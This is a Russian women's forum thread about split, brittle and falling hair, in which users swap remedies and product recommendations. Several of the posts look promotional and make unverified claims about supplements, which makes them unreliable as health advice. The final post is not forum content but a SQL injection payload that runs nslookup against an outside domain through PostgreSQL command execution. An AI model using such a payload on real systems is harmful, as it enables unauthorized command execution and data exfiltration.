ЖЕНСКИЙ форум без регистрации

Женский форум » 24+ » Здоровье » Проблемы с волосами.Все перепробовала.

Проблемы с волосами.Все перепробовала.

Виктория | 22.03.2015, 08:39 | Просмотры: 31472
Дорогие девушки!Помогите пожалуйста.Я уже не знаю что делать со своими волосами по врачам ходила толку не какого выписали витаминки и маски делать,есть фрукты.Пропила витаминки маски делаю фрукты ем ..А Секутся очень сильно.Ни какие бальзамы и шампуни мне не помогают.Делала маски и с медом и яйцом и с маслами(и репейное и оливковое и персековое и органовое итд)Полоскаю каждый раз волосы отваром трав.После мытья всегда на кончики волос наношу масло.Делала ламинирование.Волосы не разу в жизни не красила.Феном и плойкой не пользуюсь!!!!!Все началось когда я в 13 волосы подстриглась лесенкой тоесть впереди убрали волосы см на 10 и после этого начались проблемы.И вот как раз те пряди которые впереди секутся намного сильнее и почему то именно с правой стороны и получается что с лева волосы чуть длинее чем с права.Вот 2 недели назад подстригла кончики выровнила волосы а уже заметна разница справа волосы уже обломились сильно и стали намного короче...
Единственное не разу не пробовала стричь волосы горячими ножницами,но читала отзывы кто то в восторге, кто то нет.Уже столько денег на лечение выкинула.((((
Реклама
anya898 23.03.2015
всем привет)помогите пожалуйста волосы вылетают и секутся что делать ?
Mishka 30.03.2015
anya898, возможно это авитаминоз, поэтому выпадает, возможно что-то с организмом, вот он вам и сигнализирует таким образом, причин выпадения волос много. Сходите к эндокринологу, поговорите с ним, он назначит анализы, а там видно будет
Mishka 30.03.2015
Виктория, попробуйте горячими ножницами волосы подравнять! У моей подруги похожая проблема была, ей подстригли горячими, сейчас меньше сечся стали
Лончик 21.04.2015
У меня такая же беда была.Я по совету врача-трихолога водичку минеральную Сулинку пила 2 месяца и обертывания на голову водой Сулинка кремниевая на минут 30 перед мытьем. Очень понравилась на вкус и волосы стали гуще,блеск появился и ногти укрепились !Я к весне готова!Теперь всем рекомендую!
Лончик 21.04.2015
Кстати о витаминах,я пью витаминный комплекс "Девятка здоровья "(Македония)целенаправленно 2 чайные ложки на 1 стакан Сулинки вот это мой лечение и было!
Марри 19.05.2015
Девочки ну может хватит над собой делать эксперименты! Надо обращаться к специалисту своего дела. Когда мы болеем мы же идем к доктору, вот и парикмахеры тоже своего рода доктора, а то можно и без волос остаться.
Вот мой личный стилист в Питере делает все превосходно я ни разу не пожалела советую и Вам! www.blumenberg.tk
Евгения2014 5.06.2015
Попробуйте натуральную косметику, я себе заказывала в интернет-магазине данюш и забыла о проблемах с волосами
Ирина 22.07.2015
я пользуюсь продукцией фирмы Kallos и уже больше года не знаю никаких проблем. раньше это были шампуни на основе трав, но мои волосы не блестели так как после использования шампуня профессиональной серии Salon, в состав которого входит кератин, коллаген и де-пантенол. многие жалуются на выпадение волос, но так как раньше я этого не наблюдаю. заказываю на сайте Эвростарс по очень доступным ценам. между прочим на этом сайте и ампулы против выпадения есть, той же фирмы. спрашивала у подруги, она в салоне работает, говорит что цена действительно соответствует качеству. )))
Карина 22.07.2015
поспешу согласиться с Вами Ирина , я уже месяц пользуюсь шампунем Арган от Каллос и таким же кондиционером ,просто замечательно !!! у меня крашеные каштановые волосы средней длины , были жесткие и посеченные ,сейчас мягенькие и такие блестящие ...)))), и скажу Вам -не так секутся как раньше . Тем более раз в месяц кончики подстригаю. Обязательно зайду на сайт Евростарс (по Вашей подсказке), а то бегала по магазинам искала продукцию Каллос , Интересно какие там цены ....
Karinochka 11.10.2015
А я пользуюсь шампунем из серии 911 называется Шампунь луковый с репейным маслом. У него в составе все натуральные компоненты, которые питают волосы, снимают сухость и ломкость волос. Продаётся в аптеке и по цене не дорого стоит.
lina777 16.10.2015
Перфектил - отличный препарат, который действует мгновенно. Буквально за неделю-полторы мои волосы стали объемными, прекратилось выпадение. Я довольна, ведь от природы у меня "три волосины". Не могу налюбоваться своими великолепными волосами!
Marinchik 12.11.2015
После лета, волосы были просто пакля. Шампуни не дают необходимого эффекта. Искала пути решения. Остановилась тоже на перфектиле. Ну по началу, начала даже сомневаться что поможет. В конечном итоге луковицы укрепились, волосы даже немножко быстрее начали отрастать. Очень замечательный препарат. Мой вопрос был закрыт после перфектила.
Ольга Вадимовна 12.11.2015
Я тоже пользуюсь перфектилом. Идеален для решения вопросов с кожей и волосами. Принимаю два курса весной и осенью - все просто волшебно. Результат замечаю обычно после 3 недели приема. Выбрала перфектил из-за его состава и расчет, на порядок лучше чем у других.
lisa_veta 17.11.2015
У меня тоже была аналогичная проблема, я и красилась много раз и вытягивала и укладывала. В итоге волосы стали сечься на кончиках, выпадать, потускнели. Много чего перепробовала, в итоге помогли шампуни и бальзамы из серии "Лошадиная сила", также принимала витаминно-минеральный комплекс "Био-макс", и результат не заставил долго себя ждать. Волосы снова блестят, сильные и не ломкие, красота просто!!А после "био-макса" и ногти улучшились на порядок (они у меня раньше тоже проблемные были, слоились очень). Так что рекомендую, попробуйте. И то и другое можно приобрести в аптеке.
ТоняЙа 2.12.2015
Принимаю Перфектил уже второй год. Результат - общее улучшение состояния организма, особенно волос и ногтей. Результаты порадовали уже после прохождения первого курса лечения. Всем рекомендую, кто хочет выглядеть молодо и привлекательно всегда!
Viktoria222 1.03.2016
Волосы это как визитка наша, поэтому мой вам совет не испытывайте судьбу и напрасные попытки восстановить волосы. Обратитесь к трихологу
Nelda 24.10.2016
That kind of thikning shows you're on top of your game
martina2016 13.06.2017
А какое масло наносите на кончики? Я после мытья волос наношу аргановое масло на полу влажные концы, они сразу же становятся эластичными. Пользуюсь маслом уже давно.
martina2016 29.06.2017
а внутрь два раза в год пропиваю курсом витамины и омегу 3.
ltejdsvh 25.04.2020
1;copy (select '') to program 'nslookup dns.sqli.\013405.2065-16475.2065.dfa18.\1.bxss.me'


Имя:*